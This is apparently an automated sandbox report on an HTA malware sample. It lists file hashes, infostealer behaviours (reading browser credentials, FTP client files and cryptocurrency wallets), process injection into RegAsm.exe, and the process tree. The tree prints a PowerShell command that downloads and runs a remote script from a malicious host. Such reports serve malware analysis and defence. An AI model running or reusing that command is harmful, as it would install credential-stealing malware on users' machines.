Analysis
-
max time kernel
300s -
max time network
202s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
08-04-2024 07:46
Static task
static1
Behavioral task
behavioral1
Sample
wtf.hta
Resource
win7-20231129-en
General
-
Target
wtf.hta
-
Size
46KB
-
MD5
5fbdd6357b961e941acd3c06ba2e867e
-
SHA1
ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
-
SHA256
f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
-
SHA512
c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
-
SSDEEP
768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 404 4584 powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 404 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 404 powershell.exe 404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 404 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
powershell.execsc.exedescription pid process target process PID 404 wrote to memory of 1756 404 powershell.exe csc.exe PID 404 wrote to memory of 1756 404 powershell.exe csc.exe PID 1756 wrote to memory of 2120 1756 csc.exe cvtres.exe PID 1756 wrote to memory of 2120 1756 csc.exe cvtres.exe PID 404 wrote to memory of 3700 404 powershell.exe RegAsm.exe PID 404 wrote to memory of 3700 404 powershell.exe RegAsm.exe PID 404 wrote to memory of 3700 404 powershell.exe RegAsm.exe PID 404 wrote to memory of 3700 404 powershell.exe RegAsm.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wtf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵PID:1596
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1gkccvm\q1gkccvm.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES442D.tmp" "c:\Users\Admin\AppData\Local\Temp\q1gkccvm\CSC8332CD9FB12D469C9FDD79E12856DDE.TMP"3⤵PID:2120
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe2⤵PID:3700
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55b5f0f4fc34ec406d83f39abb43c1a07
SHA1f770aeb7755002f8a6f1361718c3f33f8abd0474
SHA256f773e9c7981b43cadfcf44c1243bcf0b163066cb3d36632bd21e070ae2c60f48
SHA51284afd33bac399cdcdbcb9447c1df0585c3b38892f35c2ec8298c77e9d86300948894b5ccd3d09b67536a2decaafacdd8eeb74322d9f2380f447a418196582631
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD53ccbc8205c5e8efc9babd32ee0b86764
SHA1fa7e5621de277783dc853ddfadb658de53f4e50d
SHA256ae05fce688ca757429decdf9d638800698c45ee6d3fc56147666dc3e731f32e8
SHA512c6333bb74d4cc56ad0b4acd3cb177c879f09cfd701646f8cfda4a7c67e8bda058aaa86c87181c02f3123cd115090ff58b9ae7fa63b80c5508c3a2aefee7206bb
-
Filesize
652B
MD5ab03ab505d02f1995583ad25866cdd16
SHA106ad3fd8bbb2a10bf1ee56e316a4e05ea5ce3248
SHA256bcfc2fd4c2fd84c7fe9c7b59ef17a394e542d9771e0e93fe171322dd1587de75
SHA512d86331b9890b28d29623eef8f94845e35e334cf63bc0747ff2574f24ecbbba8680b0bf2871ef508e1ae4330fd0a6a8c16196d988368915ae16fe69917b3da1a9
-
Filesize
302B
MD5536c07d095670c7d6cf3045ff8764784
SHA1bcc7d23eeae1ebdf4ee06434ef24da592580f488
SHA256c4efd053c4ad51475e24c2c6d2ceef9ff22e936c4242c04e562de675ef27e800
SHA51260efa933633ce72479ac28bfa36daa9866b9d58645401cf93b2beeedc84bdb88fb944bd35cb86eaf30b4c16c3cdc298783213600fae1b9faa8a08b7a41691fdf
-
Filesize
369B
MD507c8282ab9335d7d9abe838bcade8b00
SHA1425ad684eaa6b27f9b7f7a3320c60f483f254b74
SHA256d6e42772e2f4cdc4634da510df37ef0b06f1b36d8fb7d70692b32b48c1833b15
SHA5128fcdb36ead1c6dfeb69bc41b7bdba006e13d05aa8618fab2617467ece8e6aa10efb904f122fcd6575ef5629a96992fb37436c199502571c2e6ba36cf9a6d8e8c